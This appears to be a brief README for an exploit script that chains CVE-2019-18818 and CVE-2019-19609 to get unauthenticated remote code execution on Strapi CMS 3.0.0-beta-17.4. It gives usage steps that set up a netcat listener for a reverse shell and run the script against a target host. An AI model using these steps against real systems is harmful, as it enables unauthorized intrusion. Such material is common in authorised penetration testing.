This exploit targets two vulnerabilities in the Strapi CMS Framework version 3.0.0-beta-17.4 allowing for unauthenticated remote code execution (RCE).
CVE-2019-18818: Weak Password Recovery Mechanism for Forgotten Password
CVSS: 9.8 - Critical
More details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS: 7.2 - High
More details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

Before running this exploit, start a netcat listener on the lport you specify in the arguments below.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>